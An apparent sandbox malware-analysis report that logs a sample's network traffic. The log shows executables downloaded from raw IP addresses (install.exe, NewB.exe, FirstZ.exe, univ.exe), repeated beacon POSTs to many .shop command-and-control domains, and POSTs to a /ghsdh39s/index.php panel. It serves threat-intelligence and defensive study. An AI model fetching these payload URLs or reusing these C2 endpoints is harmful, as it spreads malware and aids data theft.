                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb48bfb59565-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-ru
                                                                                      GET
                                                                                      http://77.221.151.47/install.exe
                                                                                      axplons.exe
                                                                                      Remote address:
                                                                                      77.221.151.47:80
                                                                                      Request
                                                                                      GET /install.exe HTTP/1.1
                                                                                      Host: 77.221.151.47
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Tue, 14 May 2024 18:01:32 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 4448942
                                                                                      Last-Modified: Thu, 02 May 2024 13:52:07 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "66339a87-43e2ae"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-us
                                                                                      DNS
                                                                                      miniaturefinerninewjs.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      miniaturefinerninewjs.shop
                                                                                      IN A
                                                                                      Response
                                                                                      miniaturefinerninewjs.shop
                                                                                      IN A
                                                                                      104.21.30.191
                                                                                      miniaturefinerninewjs.shop
                                                                                      IN A
                                                                                      172.67.173.139
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://miniaturefinerninewjs.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      104.21.30.191:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: miniaturefinerninewjs.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:33 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=lbrntapjt9vba1dm8mrs0vb12q; expires=Sat, 07-Sep-2024 11:48:12 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UiNXIt5vnjX4iBexnMj585Se2oKlYdEibWtbfEq6JFVn3U6FmKjq7sAMvH44ckx9cVujecH4bFCJxppMY%2FFwaEx7ug9%2B9%2BMaGgd8pUcXEO0Ks1iTYZqZKsApuTVCT1u2bBgbk93HZ4nnP10o6w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb4cad0f52c2-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      plaintediousidowsko.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      plaintediousidowsko.shop
                                                                                      IN A
                                                                                      Response
                                                                                      plaintediousidowsko.shop
                                                                                      IN A
                                                                                      104.21.53.146
                                                                                      plaintediousidowsko.shop
                                                                                      IN A
                                                                                      172.67.213.139
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://plaintediousidowsko.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      104.21.53.146:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: plaintediousidowsko.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:33 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=6rovv40kl83966t1lcbatbhp14; expires=Sat, 07-Sep-2024 11:48:12 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gnXep5C3vPDTKLnkHSgrcyuH7kmzQz%2F0caU1d%2FZCvfZJWEgJmGXHlwZiRE73sW33h27gI8Fi8DGNDxPaJcMzcgp%2FgOv81V7O1Pn6G%2BcCeGdUEnzkXVf7%2FnFOLFT1HCMQEZIJKMTegxRDAno%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb4f8f73732c-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      sweetsquarediaslw.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      sweetsquarediaslw.shop
                                                                                      IN A
                                                                                      Response
                                                                                      sweetsquarediaslw.shop
                                                                                      IN A
                                                                                      104.21.44.201
                                                                                      sweetsquarediaslw.shop
                                                                                      IN A
                                                                                      172.67.203.170
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://sweetsquarediaslw.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      104.21.44.201:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: sweetsquarediaslw.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:33 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=ukthujrhq0mj3ojkaf6ig8jpfo; expires=Sat, 07-Sep-2024 11:48:12 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ArxnsSZI1EKF1jD4LdDa9OWv21h3Ic6LIantNn%2BeIlR71syMjBZimyD2NvllRmj%2BUeThqEuNP0UbQ1O3B%2FMjKCggu7GEMQqCyvTpO7klm9KnWJbDgTGiQU50I2eEDqqkhtD31wy90KkO"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb525dcd94d8-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      holicisticscrarws.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      holicisticscrarws.shop
                                                                                      IN A
                                                                                      Response
                                                                                      holicisticscrarws.shop
                                                                                      IN A
                                                                                      104.21.40.92
                                                                                      holicisticscrarws.shop
                                                                                      IN A
                                                                                      172.67.183.72
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://holicisticscrarws.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      104.21.40.92:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: holicisticscrarws.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:34 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=kvks7eup6kvfg4o0tvvousbhm0; expires=Sat, 07-Sep-2024 11:48:13 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ERHbrOW%2BlYa%2B2L09YrgXCd1OzeFXW7OiWv4AXFL9Ugddu4jv5GOUxinkCA1jyAqO382vHXTSlFjUK9%2FIiPQk2oMluKO9%2Fez%2F8us6eH4bSvDMdsOJRXndG3S1b4rB1K6J2ez2gxefNrA"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 883ccb556f17731b-LHR
alt-svc: h3=":443"; ma=86400
• [US]
DNS
88.20.21.104.in-addr.arpa
Remote address: 8.8.8.8:53
Request
88.20.21.104.in-addr.arpa
IN PTR
Response
• [US]
DNS
47.151.221.77.in-addr.arpa
Remote address: 8.8.8.8:53
Request
47.151.221.77.in-addr.arpa
IN PTR
Response
• [US]
DNS
67.113.215.185.in-addr.arpa
Remote address: 8.8.8.8:53
Request
67.113.215.185.in-addr.arpa
IN PTR
Response
• [US]
DNS
191.30.21.104.in-addr.arpa
Remote address: 8.8.8.8:53
Request
191.30.21.104.in-addr.arpa
IN PTR
Response
• [US]
DNS
146.53.21.104.in-addr.arpa
Remote address: 8.8.8.8:53
Request
146.53.21.104.in-addr.arpa
IN PTR
Response
• [US]
DNS
201.44.21.104.in-addr.arpa
Remote address: 8.8.8.8:53
Request
201.44.21.104.in-addr.arpa
IN PTR
Response
• [US]
DNS
boredimperissvieos.shop
RegAsm.exe
Remote address: 8.8.8.8:53
Request
boredimperissvieos.shop
IN A
Response
boredimperissvieos.shop
IN A
172.67.186.30
boredimperissvieos.shop
IN A
104.21.72.135
• [US]
POST
https://boredimperissvieos.shop/api
RegAsm.exe
Remote address: 172.67.186.30:443
Request
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: boredimperissvieos.shop
Response
HTTP/1.1 200 OK
Date: Tue, 14 May 2024 18:01:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=b4cd8o9jrvbe4rje2unnhbkfms; expires=Sat, 07-Sep-2024 11:48:13 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8WAYd%2BUPN7UTLwrUSFUcW%2FQS0sl5c72IJ8GDP4yzHqki4CsjnrCRy0Ce3uRKw%2FEGS7CjkqwwE0uXwH11svbVk9WCXpO%2BYxaSlExspZsz7xo1upbJ42z2wVJYvt%2FcfIQVZGy1zznZL9SD4g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 883ccb58489e03b9-LHR
alt-svc: h3=":443"; ma=86400
• [US]
DNS
92.40.21.104.in-addr.arpa
Remote address: 8.8.8.8:53
Request
92.40.21.104.in-addr.arpa
IN PTR
Response
• [US]
DNS
30.186.67.172.in-addr.arpa
Remote address: 8.8.8.8:53
Request
30.186.67.172.in-addr.arpa
IN PTR
Response
• [US]
DNS
26.165.165.52.in-addr.arpa
Remote address: 8.8.8.8:53
Request
26.165.165.52.in-addr.arpa
IN PTR
Response
• [US]
DNS
206.23.85.13.in-addr.arpa
Remote address: 8.8.8.8:53
Request
206.23.85.13.in-addr.arpa
IN PTR
Response
• [DE]
GET
http://185.172.128.19/NewB.exe
axplons.exe
Remote address: 185.172.128.19:80
Request
GET /NewB.exe HTTP/1.1
Host: 185.172.128.19
Response
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 14 May 2024 18:01:39 GMT
Content-Type: application/octet-stream
Content-Length: 428544
Last-Modified: Thu, 09 Nov 2023 18:10:51 GMT
Connection: keep-alive
ETag: "654d20ab-68a00"
Accept-Ranges: bytes
• [US]
DNS
19.128.172.185.in-addr.arpa
Remote address: 8.8.8.8:53
Request
19.128.172.185.in-addr.arpa
IN PTR
Response
• [US]
DNS
smallelementyjdui.shop
RegAsm.exe
Remote address: 8.8.8.8:53
Request
smallelementyjdui.shop
IN A
Response
smallelementyjdui.shop
IN A
172.67.162.147
smallelementyjdui.shop
IN A
104.21.15.116
• [US]
DNS
smallelementyjdui.shop
RegAsm.exe
Remote address: 8.8.8.8:53
Request
smallelementyjdui.shop
IN A
Response
smallelementyjdui.shop
IN A
172.67.162.147
smallelementyjdui.shop
IN A
104.21.15.116
• [US]
POST
https://smallelementyjdui.shop/api
RegAsm.exe
Remote address: 172.67.162.147:443
Request
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: smallelementyjdui.shop
Response
HTTP/1.1 200 OK
Date: Tue, 14 May 2024 18:01:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=on96i0k1f6pak241p00mle24kk; expires=Sat, 07-Sep-2024 11:48:19 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2JNL1fB4Ystql3r5XvZ%2BJuaxZWtUGGkHfYFUZ828iXWj15zqX5flgD4ZNVEI76hxhb2KcYWI%2Bf5YRHsqwF6h%2BYdj%2FSNwf4uxqBz5uwtnx9Bk40DFlzY2DG8WuuAEjuYzxF6AN3B2RnzU"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 883ccb7df8f623dc-LHR
alt-svc: h3=":443"; ma=86400
• [US]
POST
https://smallelementyjdui.shop/api
RegAsm.exe
Remote address: 172.67.162.147:443
Request
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: smallelementyjdui.shop
Response
HTTP/1.1 200 OK
Date: Tue, 14 May 2024 18:01:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=2p4ndm8571del88mnaso46ns3r; expires=Sat, 07-Sep-2024 11:48:24 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l42gCB%2Fy3qCtJcna1Gy48nBO1%2B2saFpfhpt7kf3GCTIxh6kPjicuXGiwoYFiQjQRB9htJolSMSrof7iRZ8O4cRpnIndzcHbIAaejU4qsyVveeTqpFdcoTJ%2FXkRMHpwf%2Fxq9o7w6mfhNX"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 883ccb9cfb8623dc-LHR
alt-svc: h3=":443"; ma=86400
• [DE]
POST
http://185.172.128.19/ghsdh39s/index.php
NewB.exe
Remote address: 185.172.128.19:80
Request
POST /ghsdh39s/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.19
Content-Length: 4
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 14 May 2024 18:01:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
• [DE]
POST
http://185.172.128.19/ghsdh39s/index.php
NewB.exe
Remote address: 185.172.128.19:80
Request
POST /ghsdh39s/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.19
Content-Length: 158
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 14 May 2024 18:01:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
• [DE]
POST
http://185.172.128.19/ghsdh39s/index.php
NewB.exe
Remote address: 185.172.128.19:80
Request
POST /ghsdh39s/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.19
Content-Length: 31
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 14 May 2024 18:01:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
• [DE]
POST
http://185.172.128.19/ghsdh39s/index.php
NewB.exe
Remote address: 185.172.128.19:80
Request
POST /ghsdh39s/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.19
Content-Length: 31
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 14 May 2024 18:01:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-de
                                                                                      POST
                                                                                      http://185.172.128.19/ghsdh39s/index.php
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      185.172.128.19:80
                                                                                      Request
                                                                                      POST /ghsdh39s/index.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Host: 185.172.128.19
                                                                                      Content-Length: 31
                                                                                      Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:47 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-de
                                                                                      GET
                                                                                      http://185.172.128.19/FirstZ.exe
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      185.172.128.19:80
                                                                                      Request
                                                                                      GET /FirstZ.exe HTTP/1.1
                                                                                      Host: 185.172.128.19
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:47 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 2665984
                                                                                      Last-Modified: Mon, 29 May 2023 20:39:56 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "64750d9c-28ae00"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-de
                                                                                      POST
                                                                                      http://185.172.128.19/ghsdh39s/index.php
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      185.172.128.19:80
                                                                                      Request
                                                                                      POST /ghsdh39s/index.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Host: 185.172.128.19
                                                                                      Content-Length: 31
                                                                                      Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:49 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-fr
                                                                                      GET
                                                                                      http://5.42.67.23/dl.php?pub=mixeight
                                                                                      NewB.exe
                                                                                      Remote address:
                                                                                      5.42.67.23:80
                                                                                      Request
                                                                                      GET /dl.php?pub=mixeight HTTP/1.1
                                                                                      Host: 5.42.67.23
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:41 GMT
                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                      Pragma: public
                                                                                      Expires: 0
                                                                                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                                                      Cache-Control: private
                                                                                      Content-Disposition: attachment; filename="univ.exe";
                                                                                      Content-Transfer-Encoding: binary
                                                                                      Content-Length: 290304
                                                                                      Content-Type: application/octet-stream
                                                                                    • flag-us
                                                                                      DNS
                                                                                      sofaprivateawarderysj.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      sofaprivateawarderysj.shop
                                                                                      IN A
                                                                                      Response
                                                                                      sofaprivateawarderysj.shop
                                                                                      IN A
                                                                                      104.21.95.16
                                                                                      sofaprivateawarderysj.shop
                                                                                      IN A
                                                                                      172.67.169.40
                                                                                    • flag-us
                                                                                      DNS
                                                                                      sofaprivateawarderysj.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      sofaprivateawarderysj.shop
                                                                                      IN A
                                                                                      Response
                                                                                      sofaprivateawarderysj.shop
                                                                                      IN A
                                                                                      172.67.169.40
                                                                                      sofaprivateawarderysj.shop
                                                                                      IN A
                                                                                      104.21.95.16
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://sofaprivateawarderysj.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      104.21.95.16:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: sofaprivateawarderysj.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:41 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=5cape5m37a8i6tdhukl6mp0rse; expires=Sat, 07-Sep-2024 11:48:20 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bB4aYElEzkLc%2FvSiMfJd%2BdHN2gdnvXg0AW0g1sujIZH%2BgP5m%2FtRwnvpUC2lD5Fwl%2Bs2AAW4N%2FMS9PrSVeNVdH8QTJjZSl4ZVuWf1rgz7pJPEgGnxuVMMXHJuaHGtp6ywJy0UOse9mOJhRmITYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb80cfb1d16c-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      98.58.20.217.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      98.58.20.217.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      147.162.67.172.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      147.162.67.172.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      23.67.42.5.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      23.67.42.5.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      lineagelasserytailsd.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      lineagelasserytailsd.shop
                                                                                      IN A
                                                                                      Response
                                                                                      lineagelasserytailsd.shop
                                                                                      IN A
                                                                                      172.67.141.60
                                                                                      lineagelasserytailsd.shop
                                                                                      IN A
                                                                                      104.21.62.251
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://lineagelasserytailsd.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      172.67.141.60:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: lineagelasserytailsd.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:41 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=bdibkis6db9p2o2eqjutcnushj; expires=Sat, 07-Sep-2024 11:48:20 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qRRvxivgSOcCjVmHZ1z9IClJJyK6ovkGtLJzrGlDS2AgXgSTTzeqBb%2FlH%2B9EtTRWKYUCaQxIqBAnQVROvvqu6uPk9pnpDRE1YmshFj39bp%2BO57AKZrY7Jayi%2BHPQnjkvKUQPCSSIbmWC2yJ%2B"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 883ccb836bc623ad-LHR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                    • flag-us
                                                                                      DNS
                                                                                      tendencyportionjsuk.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      tendencyportionjsuk.shop
                                                                                      IN A
                                                                                      Response
                                                                                      tendencyportionjsuk.shop
                                                                                      IN A
                                                                                      172.67.205.185
                                                                                      tendencyportionjsuk.shop
                                                                                      IN A
                                                                                      104.21.85.127
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://tendencyportionjsuk.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      172.67.205.185:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: tendencyportionjsuk.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:42 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=k575f85p93ljr88f0gbt4c4r7n; expires=Sat, 07-Sep-2024 11:48:21 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uwbx8woa0Yf8L4L6dV3c4BWiFVHMT2yOny0cUbdSrNzNcaik%2BzPA1M3jdi4K4m4rMaRDbt6zE1nZYTD7v%2BVVRGe7fLlCft%2F6Ep%2FjG8jufD1pTcqAi0a7qqpZYT5FhutLAAh%2BZzC3CTyFxPo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
